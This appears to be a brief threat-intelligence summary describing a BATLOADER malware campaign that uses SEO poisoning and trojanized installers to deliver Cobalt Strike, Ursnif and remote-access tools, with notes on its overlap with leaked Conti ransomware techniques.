A new campaign has been discovered using search engine optimization (SEO) poisoning to trick users into downloading BATLOADER malware. The SEO keyword themes used as part of the poisoning include terms like “free productivity apps installation” or “free software development tools.”
The malware hosted on these poisoned search result sites are an installer that contains both the legitimate software, such as Visual Studio or Zoom, and the BATLOADER payload. When executed, the malware payload triggers an infection chain using commonly abused Windows binaries to download and execute further payloads. Final payloads used during this campaign include Cobalt Strike beacons, Ursnif, SplashTop and ATERA to establish remote access and persistence, with further post-exploitation frameworks following. In some cases, ATERA was found to be the initial payload deployed, thus bypassing a majority of the infection chain and directly installing the final remote access payload.
This style of attack overlaps with the techniques utilized by the Conti ransomware gang, as disclosed in the documentation leak from a Conti affiliate last year. However, due to the public release of this information, it is likely that another unaffiliated actor is replicating Conti’s techniques to use for their own motives.